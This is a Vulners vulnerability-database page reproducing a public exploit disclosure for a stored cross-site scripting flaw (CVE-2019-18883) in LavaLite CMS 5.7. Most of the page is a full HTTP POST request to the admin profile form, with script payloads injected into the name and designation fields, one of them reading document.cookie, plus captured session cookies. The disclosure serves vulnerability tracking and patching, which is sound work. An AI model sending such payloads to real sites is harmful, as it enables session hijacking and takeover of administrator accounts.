Vulners
Lucene search
LavaLite CMS 5.7 Cross Site Scripting
🗓️ 12 Nov 2019 00:00:00Reported by Ismail TasdelenType 
packetstorm🔗 packetstormsecurity.com👁 122 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2019-18883 | 13 Feb 202415:36 | – | circl |
 | Lavalite Cross-Site Scripting Vulnerability (CNVD-2020-41526) | 14 Nov 201900:00 | – | cnvd |
 | CVE-2019-18883 | 13 Nov 201919:55 | – | cve |
 | CVE-2019-18883 | 13 Nov 201919:55 | – | cvelist |
 | EUVD-2019-8571 | 7 Oct 202500:30 | – | euvd |
 | CVE-2019-18883 | 13 Nov 201920:15 | – | nvd |
 | Cross site scripting | 13 Nov 201920:15 | – | prion |
 | CVE-2019-18883 | 22 May 202508:24 | – | redhatcve |
`# Exploit Title: LavaLite CMS - 5.7 - Cross-Site Scripting
# Date: 09-10-2019
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://lavalite.org/
# Software Link : https://github.com/LavaLite/cms
# Software : LavaLite CMS - v 5.7
# Version : v 5.7
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-18883
# The XSS vulnerability has been discovered in the LavaLite CMS web application software due to its vulnerability in the source code in version 5.7.
# XSS exists in Lavalite 5.7 via the admin/profile name and designation field.
# HTTP POST Request :
POST /admin/profile HTTP/1.1
Host: demo.lavalite.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 326
Origin: http://demo.lavalite.org
Connection: close
Referer: http://demo.lavalite.org/admin/profile
Cookie: XSRF-TOKEN=eyJpdiI6Ik9uNGJSNVlPWjdrQjZPOEFnK1lQVVE9PSIsInZhbHVlIjoibCt3Z1ZreWc3a2dlbTRjdzd4bGxEY1wveHdPM1FtUVwvdE9VekZcLytGVHoxVkRWMHp4Nzh6WGxcL1lZVkR1THRxNGc1b0dxb2h5WUpyUHQ0VzBuY0pYK3FnPT0iLCJtYWMiOiI5YjA4ZmVmZjFjYmJlYTk4NGMzN2ZjNWQ2ZTVlNTVhODcwNTk5OWIxMWVjZDUyYzAzN2RiNzc2ZDA2MzU0MzI1In0%3D; laravel_session=eyJpdiI6IjBKb0U5Y1BrbmRnNUNtNGtnRmpQZlE9PSIsInZhbHVlIjoiakhzQVwvakRkV0tjWmtidHNMcGNRQjJHMGRYSkZ3S0x5TW9EUmhmWWtCR0d6UzNaY1k5OHVOMTJVcFFTanBpSmhEeTR1RnNJOVwvZVF6MGN2dVNxSFpXUT09IiwibWFjIjoiNThjZDBiNmJmMDI5OTg0ZTMzYzFmNGEzN2I0MWViNjU5MDU1MjcxNWFlYjMzYzE2MDM2MWE5ZjIxOGM2OTE0ZCJ9; _ga=GA1.2.17118095.1573277553; _gid=GA1.2.2027008389.1573277553
Upgrade-Insecure-Requests: 1
name=Super+User"><script>alert("ismailtasdelen")</script>&dob=15+May+2014&designation=Super+User"><script>alert(document.cookie)</script>&mobile=&phone=&file=&photo%5B0%5D%5Bcaption%5D=&photo%5B0%5D%5Bfile%5D=&photo%5B0%5D%5Bfolder%5D=&photo%5B0%5D%5Bpath%5D=&photo%5B0%5D%5Btime%5D=&address=&street=&city=&district=&state=&country=&web=http%3A%2F%2Flitepie.org&_token=ErmRyuzAgksfnvgmp7ew7xPQlcE7hsmTguPZ3QGS
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Nov 2019 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00328